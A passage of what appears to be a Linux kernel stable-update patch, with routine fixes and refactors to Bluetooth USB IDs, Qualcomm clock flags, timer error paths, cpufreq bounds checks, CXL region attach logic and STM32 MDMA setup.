++	{ USB_DEVICE(0x0bda, 0xb85b), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3570), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3571), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek Bluetooth devices */
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x0bda, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_REALTEK },
+@@ -2638,6 +2650,9 @@ static int btusb_mtk_hci_wmt_sync(struct hci_dev *hdev,
+ 		goto err_free_wc;
+ 	}
+ 
++	if (data->evt_skb == NULL)
++		goto err_free_wc;
++
+ 	/* Parse and handle the return WMT event */
+ 	wmt_evt = (struct btmtk_hci_wmt_evt *)data->evt_skb->data;
+ 	if (wmt_evt->whdr.op != hdr->op) {
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index cde62a11f5736..4c5c7a8f41d08 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -75,7 +75,6 @@ static struct clk_fixed_factor gpll0_out_main_div2 = {
+ 				&gpll0_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -89,7 +88,6 @@ static struct clk_alpha_pll_postdiv gpll0 = {
+ 				&gpll0_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -164,7 +162,6 @@ static struct clk_alpha_pll_postdiv gpll6 = {
+ 				&gpll6_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -195,7 +192,6 @@ static struct clk_alpha_pll_postdiv gpll4 = {
+ 				&gpll4_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -246,7 +242,6 @@ static struct clk_alpha_pll_postdiv gpll2 = {
+ 				&gpll2_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -277,7 +272,6 @@ static struct clk_alpha_pll_postdiv nss_crypto_pll = {
+ 				&nss_crypto_pll_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-ipq8074.c b/drivers/clk/qcom/gcc-ipq8074.c
+index 42d185fe19c8c..b2e83b38976e5 100644
+--- a/drivers/clk/qcom/gcc-ipq8074.c
++++ b/drivers/clk/qcom/gcc-ipq8074.c
+@@ -419,7 +419,6 @@ static struct clk_fixed_factor gpll0_out_main_div2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -466,7 +465,6 @@ static struct clk_alpha_pll_postdiv gpll2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -499,7 +497,6 @@ static struct clk_alpha_pll_postdiv gpll4 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -533,7 +530,6 @@ static struct clk_alpha_pll_postdiv gpll6 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -547,7 +543,6 @@ static struct clk_fixed_factor gpll6_out_main_div2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -612,7 +607,6 @@ static struct clk_alpha_pll_postdiv nss_crypto_pll = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/socfpga/stratix10-clk.h b/drivers/clk/socfpga/stratix10-clk.h
+index 75234e0783e1c..83fe4eb3133cb 100644
+--- a/drivers/clk/socfpga/stratix10-clk.h
++++ b/drivers/clk/socfpga/stratix10-clk.h
+@@ -7,8 +7,10 @@
+ #define	__STRATIX10_CLK_H
+ 
+ struct stratix10_clock_data {
+-	struct clk_hw_onecell_data	clk_data;
+ 	void __iomem		*base;
++
++	/* Must be last */
++	struct clk_hw_onecell_data	clk_data;
+ };
+ 
+ struct stratix10_pll_clock {
+diff --git a/drivers/clk/visconti/pll.h b/drivers/clk/visconti/pll.h
+index 16dae35ab3701..c4bd40676da4b 100644
+--- a/drivers/clk/visconti/pll.h
++++ b/drivers/clk/visconti/pll.h
+@@ -15,9 +15,10 @@
+ 
+ struct visconti_pll_provider {
+ 	void __iomem *reg_base;
+-	struct regmap *regmap;
+-	struct clk_hw_onecell_data clk_data;
+ 	struct device_node *node;
++
++	/* Must be last */
++	struct clk_hw_onecell_data clk_data;
+ };
+ 
+ #define VISCONTI_PLL_RATE(_rate, _dacen, _dsmen, \
+diff --git a/drivers/clocksource/timer-atmel-tcb.c b/drivers/clocksource/timer-atmel-tcb.c
+index 27af17c995900..2a90c92a9182a 100644
+--- a/drivers/clocksource/timer-atmel-tcb.c
++++ b/drivers/clocksource/timer-atmel-tcb.c
+@@ -315,6 +315,7 @@ static void __init tcb_setup_dual_chan(struct atmel_tc *tc, int mck_divisor_idx)
+ 	writel(mck_divisor_idx			/* likely divide-by-8 */
+ 			| ATMEL_TC_WAVE
+ 			| ATMEL_TC_WAVESEL_UP		/* free-run */
++			| ATMEL_TC_ASWTRG_SET		/* TIOA0 rises at software trigger */
+ 			| ATMEL_TC_ACPA_SET		/* TIOA0 rises at 0 */
+ 			| ATMEL_TC_ACPC_CLEAR,		/* (duty cycle 50%) */
+ 			tcaddr + ATMEL_TC_REG(0, CMR));
+diff --git a/drivers/clocksource/timer-imx-gpt.c b/drivers/clocksource/timer-imx-gpt.c
+index 7b2c70f2f353b..fabff69e52e58 100644
+--- a/drivers/clocksource/timer-imx-gpt.c
++++ b/drivers/clocksource/timer-imx-gpt.c
+@@ -454,12 +454,16 @@ static int __init mxc_timer_init_dt(struct device_node *np,  enum imx_gpt_type t
+ 		return -ENOMEM;
+ 
+ 	imxtm->base = of_iomap(np, 0);
+-	if (!imxtm->base)
+-		return -ENXIO;
++	if (!imxtm->base) {
++		ret = -ENXIO;
++		goto err_kfree;
++	}
+ 
+ 	imxtm->irq = irq_of_parse_and_map(np, 0);
+-	if (imxtm->irq <= 0)
+-		return -EINVAL;
++	if (imxtm->irq <= 0) {
++		ret = -EINVAL;
++		goto err_kfree;
++	}
+ 
+ 	imxtm->clk_ipg = of_clk_get_by_name(np, "ipg");
+ 
+@@ -472,11 +476,15 @@ static int __init mxc_timer_init_dt(struct device_node *np,  enum imx_gpt_type t
+ 
+ 	ret = _mxc_timer_init(imxtm);
+ 	if (ret)
+-		return ret;
++		goto err_kfree;
+ 
+ 	initialized = 1;
+ 
+ 	return 0;
++
++err_kfree:
++	kfree(imxtm);
++	return ret;
+ }
+ 
+ static int __init imx1_timer_init_dt(struct device_node *np)
+diff --git a/drivers/cpufreq/cpufreq_stats.c b/drivers/cpufreq/cpufreq_stats.c
+index 1570d6f3e75d3..6e57df7a2249f 100644
+--- a/drivers/cpufreq/cpufreq_stats.c
++++ b/drivers/cpufreq/cpufreq_stats.c
+@@ -131,25 +131,25 @@ static ssize_t show_trans_table(struct cpufreq_policy *policy, char *buf)
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "   From  :    To\n");
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "         : ");
+ 	for (i = 0; i < stats->state_num; i++) {
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "%9u ",
+ 				stats->freq_table[i]);
+ 	}
+-	if (len >= PAGE_SIZE)
+-		return PAGE_SIZE;
++	if (len >= PAGE_SIZE - 1)
++		return PAGE_SIZE - 1;
+ 
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "\n");
+ 
+ 	for (i = 0; i < stats->state_num; i++) {
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "%9u: ",
+ 				stats->freq_table[i]);
+ 
+ 		for (j = 0; j < stats->state_num; j++) {
+-			if (len >= PAGE_SIZE)
++			if (len >= PAGE_SIZE - 1)
+ 				break;
+ 
+ 			if (pending)
+@@ -159,12 +159,12 @@ static ssize_t show_trans_table(struct cpufreq_policy *policy, char *buf)
+ 
+ 			len += scnprintf(buf + len, PAGE_SIZE - len, "%9u ", count);
+ 		}
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "\n");
+ 	}
+ 
+-	if (len >= PAGE_SIZE) {
++	if (len >= PAGE_SIZE - 1) {
+ 		pr_warn_once("cpufreq transition table exceeds PAGE_SIZE. Disabling\n");
+ 		return -EFBIG;
+ 	}
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index a4a3895c74181..f9acf7ecc41be 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -841,6 +841,8 @@ static void qm_poll_req_cb(struct hisi_qp *qp)
+ 		qm_db(qm, qp->qp_id, QM_DOORBELL_CMD_CQ,
+ 		      qp->qp_status.cq_head, 0);
+ 		atomic_dec(&qp->qp_status.used);
++
++		cond_resched();
+ 	}
+ 
+ 	/* set c_flag */
+diff --git a/drivers/cxl/acpi.c b/drivers/cxl/acpi.c
+index 07b184382707e..dd610556a3afa 100644
+--- a/drivers/cxl/acpi.c
++++ b/drivers/cxl/acpi.c
+@@ -219,7 +219,6 @@ static int add_host_bridge_uport(struct device *match, void *arg)
+ 	port = devm_cxl_add_port(host, match, dport->component_reg_phys, dport);
+ 	if (IS_ERR(port))
+ 		return PTR_ERR(port);
+-	dev_dbg(host, "%s: add: %s\n", dev_name(match), dev_name(&port->dev));
+ 
+ 	return 0;
+ }
+@@ -465,7 +464,6 @@ static int cxl_acpi_probe(struct platform_device *pdev)
+ 	root_port = devm_cxl_add_port(host, host, CXL_RESOURCE_NONE, NULL);
+ 	if (IS_ERR(root_port))
+ 		return PTR_ERR(root_port);
+-	dev_dbg(host, "add: %s\n", dev_name(&root_port->dev));
+ 
+ 	rc = bus_for_each_dev(adev->dev.bus, NULL, root_port,
+ 			      add_host_bridge_dport);
+diff --git a/drivers/cxl/core/core.h b/drivers/cxl/core/core.h
+index 1d8f87be283fb..cbee2340f1bce 100644
+--- a/drivers/cxl/core/core.h
++++ b/drivers/cxl/core/core.h
+@@ -56,17 +56,6 @@ resource_size_t cxl_dpa_size(struct cxl_endpoint_decoder *cxled);
+ resource_size_t cxl_dpa_resource_start(struct cxl_endpoint_decoder *cxled);
+ extern struct rw_semaphore cxl_dpa_rwsem;
+ 
+-bool is_switch_decoder(struct device *dev);
+-struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev);
+-static inline struct cxl_ep *cxl_ep_load(struct cxl_port *port,
+-					 struct cxl_memdev *cxlmd)
+-{
+-	if (!port)
+-		return NULL;
+-
+-	return xa_load(&port->endpoints, (unsigned long)&cxlmd->dev);
+-}
+-
+ int cxl_memdev_init(void);
+ void cxl_memdev_exit(void);
+ void cxl_mbox_init(void);
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index 5aa0726aafe6f..8c1db4e1b816d 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -276,7 +276,7 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 	return 0;
+ }
+ 
+-static int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
++int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 				resource_size_t base, resource_size_t len,
+ 				resource_size_t skipped)
+ {
+@@ -292,6 +292,7 @@ static int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	return devm_add_action_or_reset(&port->dev, cxl_dpa_release, cxled);
+ }
++EXPORT_SYMBOL_NS_GPL(devm_cxl_dpa_reserve, CXL);
+ 
+ resource_size_t cxl_dpa_size(struct cxl_endpoint_decoder *cxled)
+ {
+diff --git a/drivers/cxl/core/port.c b/drivers/cxl/core/port.c
+index e7556864ea808..bd41424319807 100644
+--- a/drivers/cxl/core/port.c
++++ b/drivers/cxl/core/port.c
+@@ -455,6 +455,7 @@ bool is_switch_decoder(struct device *dev)
+ {
+ 	return is_root_decoder(dev) || dev->type == &cxl_decoder_switch_type;
+ }
++EXPORT_SYMBOL_NS_GPL(is_switch_decoder, CXL);
+ 
+ struct cxl_decoder *to_cxl_decoder(struct device *dev)
+ {
+@@ -482,6 +483,7 @@ struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev)
+ 		return NULL;
+ 	return container_of(dev, struct cxl_switch_decoder, cxld.dev);
+ }
++EXPORT_SYMBOL_NS_GPL(to_cxl_switch_decoder, CXL);
+ 
+ static void cxl_ep_release(struct cxl_ep *ep)
+ {
+@@ -655,16 +657,10 @@ err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/**
+- * devm_cxl_add_port - register a cxl_port in CXL memory decode hierarchy
+- * @host: host device for devm operations
+- * @uport: "physical" device implementing this upstream port
+- * @component_reg_phys: (optional) for configurable cxl_port instances
+- * @parent_dport: next hop up in the CXL memory decode hierarchy
+- */
+-struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
+-				   resource_size_t component_reg_phys,
+-				   struct cxl_dport *parent_dport)
++static struct cxl_port *__devm_cxl_add_port(struct device *host,
++					    struct device *uport,
++					    resource_size_t component_reg_phys,
++					    struct cxl_dport *parent_dport)
+ {
+ 	struct cxl_port *port;
+ 	struct device *dev;
+@@ -702,6 +698,40 @@ err:
+ 	put_device(dev);
+ 	return ERR_PTR(rc);
+ }
++
++/**
++ * devm_cxl_add_port - register a cxl_port in CXL memory decode hierarchy
++ * @host: host device for devm operations
++ * @uport: "physical" device implementing this upstream port
++ * @component_reg_phys: (optional) for configurable cxl_port instances
++ * @parent_dport: next hop up in the CXL memory decode hierarchy
++ */
++struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
++				   resource_size_t component_reg_phys,
++				   struct cxl_dport *parent_dport)
++{
++	struct cxl_port *port, *parent_port;
++
++	port = __devm_cxl_add_port(host, uport, component_reg_phys,
++				   parent_dport);
++
++	parent_port = parent_dport ? parent_dport->port : NULL;
++	if (IS_ERR(port)) {
++		dev_dbg(uport, "Failed to add%s%s%s: %ld\n",
++			parent_port ? " port to " : "",
++			parent_port ? dev_name(&parent_port->dev) : "",
++			parent_port ? "" : " root port",
++			PTR_ERR(port));
++	} else {
++		dev_dbg(uport, "%s added%s%s%s\n",
++			dev_name(&port->dev),
++			parent_port ? " to " : "",
++			parent_port ? dev_name(&parent_port->dev) : "",
++			parent_port ? "" : " (root port)");
++	}
++
++	return port;
++}
+ EXPORT_SYMBOL_NS_GPL(devm_cxl_add_port, CXL);
+ 
+ struct pci_bus *cxl_port_to_pci_bus(struct cxl_port *port)
+@@ -1122,47 +1152,6 @@ static void reap_dports(struct cxl_port *port)
+ 	}
+ }
+ 
+-int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
+-			  struct cxl_dport *parent_dport)
+-{
+-	struct cxl_port *parent_port = parent_dport->port;
+-	struct cxl_dev_state *cxlds = cxlmd->cxlds;
+-	struct cxl_port *endpoint, *iter, *down;
+-	int rc;
+-
+-	/*
+-	 * Now that the path to the root is established record all the
+-	 * intervening ports in the chain.
+-	 */
+-	for (iter = parent_port, down = NULL; !is_cxl_root(iter);
+-	     down = iter, iter = to_cxl_port(iter->dev.parent)) {
+-		struct cxl_ep *ep;
+-
+-		ep = cxl_ep_load(iter, cxlmd);
+-		ep->next = down;
+-	}
+-
+-	endpoint = devm_cxl_add_port(&parent_port->dev, &cxlmd->dev,
+-				     cxlds->component_reg_phys, parent_dport);
+-	if (IS_ERR(endpoint))
+-		return PTR_ERR(endpoint);
+-
+-	dev_dbg(&cxlmd->dev, "add: %s\n", dev_name(&endpoint->dev));
+-
+-	rc = cxl_endpoint_autoremove(cxlmd, endpoint);
+-	if (rc)
+-		return rc;
+-
+-	if (!endpoint->dev.driver) {
+-		dev_err(&cxlmd->dev, "%s failed probe\n",
+-			dev_name(&endpoint->dev));
+-		return -ENXIO;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_NS_GPL(devm_cxl_add_endpoint, CXL);
+-
+ static void cxl_detach_ep(void *data)
+ {
+ 	struct cxl_memdev *cxlmd = data;
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index 9709bbf773b72..ebc1b028555ca 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -1012,7 +1012,14 @@ static int cxl_port_setup_targets(struct cxl_port *port,
+ 	}
+ 
+ 	if (is_cxl_root(parent_port)) {
+-		parent_ig = cxlrd->cxlsd.cxld.interleave_granularity;
++		/*
++		 * Root decoder IG is always set to value in CFMWS which
++		 * may be different than this region's IG.  We can use the
++		 * region's IG here since interleave_granularity_store()
++		 * does not allow interleaved host-bridges with
++		 * root IG != region IG.
++		 */
++		parent_ig = p->interleave_granularity;
+ 		parent_iw = cxlrd->cxlsd.cxld.interleave_ways;
+ 		/*
+ 		 * For purposes of address bit routing, use power-of-2 math for
+@@ -1181,29 +1188,13 @@ static int cxl_region_setup_targets(struct cxl_region *cxlr)
+ 	return 0;
+ }
+ 
+-static int cxl_region_attach(struct cxl_region *cxlr,
+-			     struct cxl_endpoint_decoder *cxled, int pos)
++static int cxl_region_validate_position(struct cxl_region *cxlr,
++					struct cxl_endpoint_decoder *cxled,
++					int pos)
+ {
+-	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
+ 	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
+-	struct cxl_port *ep_port, *root_port, *iter;
+ 	struct cxl_region_params *p = &cxlr->params;
+-	struct cxl_dport *dport;
+-	int i, rc = -ENXIO;
+-
+-	if (cxled->mode == CXL_DECODER_DEAD) {
+-		dev_dbg(&cxlr->dev, "%s dead\n", dev_name(&cxled->cxld.dev));
+-		return -ENODEV;
+-	}
+-
+-	/* all full of members, or interleave config not established? */
+-	if (p->state > CXL_CONFIG_INTERLEAVE_ACTIVE) {
+-		dev_dbg(&cxlr->dev, "region already active\n");
+-		return -EBUSY;
+-	} else if (p->state < CXL_CONFIG_INTERLEAVE_ACTIVE) {
+-		dev_dbg(&cxlr->dev, "interleave config missing\n");
+-		return -ENXIO;
+-	}
++	int i;
+ 
+ 	if (pos < 0 || pos >= p->interleave_ways) {
+ 		dev_dbg(&cxlr->dev, "position %d out of range %d\n", pos,
+@@ -1242,6 +1233,77 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		}
+ 	}
+ 
++	return 0;
++}
++
++static int cxl_region_attach_position(struct cxl_region *cxlr,
++				      struct cxl_root_decoder *cxlrd,
++				      struct cxl_endpoint_decoder *cxled,
++				      const struct cxl_dport *dport, int pos)
++{
++	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
++	struct cxl_port *iter;
++	int rc;
++
++	if (cxlrd->calc_hb(cxlrd, pos) != dport) {
++		dev_dbg(&cxlr->dev, "%s:%s invalid target position for %s\n",
++			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
++			dev_name(&cxlrd->cxlsd.cxld.dev));
++		return -ENXIO;
++	}
++
++	for (iter = cxled_to_port(cxled); !is_cxl_root(iter);
++	     iter = to_cxl_port(iter->dev.parent)) {
++		rc = cxl_port_attach_region(iter, cxlr, cxled, pos);
++		if (rc)
++			goto err;
++	}
++
++	return 0;
++
++err:
++	for (iter = cxled_to_port(cxled); !is_cxl_root(iter);
++	     iter = to_cxl_port(iter->dev.parent))
++		cxl_port_detach_region(iter, cxlr, cxled);
++	return rc;
++}
++
++static int cxl_region_attach(struct cxl_region *cxlr,
++			     struct cxl_endpoint_decoder *cxled, int pos)
++{
++	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
++	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
++	struct cxl_region_params *p = &cxlr->params;
++	struct cxl_port *ep_port, *root_port;
++	struct cxl_dport *dport;
++	int rc = -ENXIO;
++
++	if (cxled->mode != cxlr->mode) {
++		dev_dbg(&cxlr->dev, "%s region mode: %d mismatch: %d\n",
++			dev_name(&cxled->cxld.dev), cxlr->mode, cxled->mode);
++		return -EINVAL;
++	}
++
++	if (cxled->mode == CXL_DECODER_DEAD) {
++		dev_dbg(&cxlr->dev, "%s dead\n", dev_name(&cxled->cxld.dev));
++		return -ENODEV;
++	}
++
++	/* all full of members, or interleave config not established? */
++	if (p->state > CXL_CONFIG_INTERLEAVE_ACTIVE) {
++		dev_dbg(&cxlr->dev, "region already active\n");
++		return -EBUSY;
++	} else if (p->state < CXL_CONFIG_INTERLEAVE_ACTIVE) {
++		dev_dbg(&cxlr->dev, "interleave config missing\n");
++		return -ENXIO;
++	}
++
++	if (p->nr_targets >= p->interleave_ways) {
++		dev_dbg(&cxlr->dev, "region already has %d endpoints\n",
++			p->nr_targets);
++		return -EINVAL;
++	}
++
+ 	ep_port = cxled_to_port(cxled);
+ 	root_port = cxlrd_to_port(cxlrd);
+ 	dport = cxl_find_dport_by_dev(root_port, ep_port->host_bridge);
+@@ -1252,13 +1314,6 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		return -ENXIO;
+ 	}
+ 
+-	if (cxlrd->calc_hb(cxlrd, pos) != dport) {
+-		dev_dbg(&cxlr->dev, "%s:%s invalid target position for %s\n",
+-			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
+-			dev_name(&cxlrd->cxlsd.cxld.dev));
+-		return -ENXIO;
+-	}
+-
+ 	if (cxled->cxld.target_type != cxlr->type) {
+ 		dev_dbg(&cxlr->dev, "%s:%s type mismatch: %d vs %d\n",
+ 			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
+@@ -1282,12 +1337,13 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		return -EINVAL;
+ 	}
+ 
+-	for (iter = ep_port; !is_cxl_root(iter);
+-	     iter = to_cxl_port(iter->dev.parent)) {
+-		rc = cxl_port_attach_region(iter, cxlr, cxled, pos);
+-		if (rc)
+-			goto err;
+-	}
++	rc = cxl_region_validate_position(cxlr, cxled, pos);
++	if (rc)
++		return rc;
++
++	rc = cxl_region_attach_position(cxlr, cxlrd, cxled, dport, pos);
++	if (rc)
++		return rc;
+ 
+ 	p->targets[pos] = cxled;
+ 	cxled->pos = pos;
+@@ -1296,7 +1352,7 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 	if (p->nr_targets == p->interleave_ways) {
+ 		rc = cxl_region_setup_targets(cxlr);
+ 		if (rc)
+-			goto err_decrement;
++			return rc;
+ 		p->state = CXL_CONFIG_ACTIVE;
+ 	}
+ 
+@@ -1308,14 +1364,6 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 	};
+ 
+ 	return 0;
+-
+-err_decrement:
+-	p->nr_targets--;
+-err:
+-	for (iter = ep_port; !is_cxl_root(iter);
+-	     iter = to_cxl_port(iter->dev.parent))
+-		cxl_port_detach_region(iter, cxlr, cxled);
+-	return rc;
+ }
+ 
+ static int cxl_region_detach(struct cxl_endpoint_decoder *cxled)
+diff --git a/drivers/cxl/cxl.h b/drivers/cxl/cxl.h
+index ac75554b5d763..7750ccb7652db 100644
+--- a/drivers/cxl/cxl.h
++++ b/drivers/cxl/cxl.h
+@@ -562,8 +562,6 @@ struct pci_bus *cxl_port_to_pci_bus(struct cxl_port *port);
+ struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
+ 				   resource_size_t component_reg_phys,
+ 				   struct cxl_dport *parent_dport);
+-int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
+-			  struct cxl_dport *parent_dport);
+ struct cxl_port *find_cxl_root(struct device *dev);
+ int devm_cxl_enumerate_ports(struct cxl_memdev *cxlmd);
+ int cxl_bus_rescan(void);
+@@ -577,8 +575,10 @@ struct cxl_dport *devm_cxl_add_dport(struct cxl_port *port,
+ 
+ struct cxl_decoder *to_cxl_decoder(struct device *dev);
+ struct cxl_root_decoder *to_cxl_root_decoder(struct device *dev);
++struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev);
+ struct cxl_endpoint_decoder *to_cxl_endpoint_decoder(struct device *dev);
+ bool is_root_decoder(struct device *dev);
++bool is_switch_decoder(struct device *dev);
+ bool is_endpoint_decoder(struct device *dev);
+ struct cxl_root_decoder *cxl_root_decoder_alloc(struct cxl_port *port,
+ 						unsigned int nr_targets);
+diff --git a/drivers/cxl/cxlmem.h b/drivers/cxl/cxlmem.h
+index 88e3a8e54b6a4..b58a5b782e5dc 100644
+--- a/drivers/cxl/cxlmem.h
++++ b/drivers/cxl/cxlmem.h
+@@ -75,6 +75,18 @@ static inline bool is_cxl_endpoint(struct cxl_port *port)
+ }
+ 
+ struct cxl_memdev *devm_cxl_add_memdev(struct cxl_dev_state *cxlds);
++int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
++			 resource_size_t base, resource_size_t len,
++			 resource_size_t skipped);
++
++static inline struct cxl_ep *cxl_ep_load(struct cxl_port *port,
++					 struct cxl_memdev *cxlmd)
++{
++	if (!port)
++		return NULL;
++
++	return xa_load(&port->endpoints, (unsigned long)&cxlmd->dev);
++}
+ 
+ /**
+  * struct cxl_mbox_cmd - A command to be submitted to hardware.
+diff --git a/drivers/cxl/mem.c b/drivers/cxl/mem.c
+index 64ccf053d32c3..80263d12a8541 100644
+--- a/drivers/cxl/mem.c
++++ b/drivers/cxl/mem.c
+@@ -45,6 +45,44 @@ static int cxl_mem_dpa_show(struct seq_file *file, void *data)
+ 	return 0;
+ }
+ 
++static int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
++				 struct cxl_dport *parent_dport)
++{
++	struct cxl_port *parent_port = parent_dport->port;
++	struct cxl_dev_state *cxlds = cxlmd->cxlds;
++	struct cxl_port *endpoint, *iter, *down;
++	int rc;
++
++	/*
++	 * Now that the path to the root is established record all the
++	 * intervening ports in the chain.
++	 */
++	for (iter = parent_port, down = NULL; !is_cxl_root(iter);
++	     down = iter, iter = to_cxl_port(iter->dev.parent)) {
++		struct cxl_ep *ep;
++
++		ep = cxl_ep_load(iter, cxlmd);
++		ep->next = down;
++	}
++
++	endpoint = devm_cxl_add_port(&parent_port->dev, &cxlmd->dev,
++				     cxlds->component_reg_phys, parent_dport);
++	if (IS_ERR(endpoint))
++		return PTR_ERR(endpoint);
++
++	rc = cxl_endpoint_autoremove(cxlmd, endpoint);
++	if (rc)
++		return rc;
++
++	if (!endpoint->dev.driver) {
++		dev_err(&cxlmd->dev, "%s failed probe\n",
++			dev_name(&endpoint->dev));
++		return -ENXIO;
++	}
++
++	return 0;
++}
++
+ static int cxl_mem_probe(struct device *dev)
+ {
+ 	struct cxl_memdev *cxlmd = to_cxl_memdev(dev);
+diff --git a/drivers/dma/stm32-mdma.c b/drivers/dma/stm32-mdma.c
+index 4e9bab61f4663..65ef1f5ca6b89 100644
+--- a/drivers/dma/stm32-mdma.c
++++ b/drivers/dma/stm32-mdma.c
+@@ -490,7 +490,7 @@ static int stm32_mdma_set_xfer_param(struct stm32_mdma_chan *chan,
+ 	src_maxburst = chan->dma_config.src_maxburst;
+ 	dst_maxburst = chan->dma_config.dst_maxburst;
+ 
+-	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id));
++	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & ~STM32_MDMA_CCR_EN;
+ 	ctcr = stm32_mdma_read(dmadev, STM32_MDMA_CTCR(chan->id));
+ 	ctbr = stm32_mdma_read(dmadev, STM32_MDMA_CTBR(chan->id));
+ 
+@@ -966,7 +966,7 @@ stm32_mdma_prep_dma_memcpy(struct dma_chan *c, dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
+ 		return NULL;
+ 
+-	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id));
++	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & ~STM32_MDMA_CCR_EN;
+ 	ctcr = stm32_mdma_read(dmadev, STM32_MDMA_CTCR(chan->id));
+ 	ctbr = stm32_mdma_read(dmadev, STM32_MDMA_CTBR(chan->id));
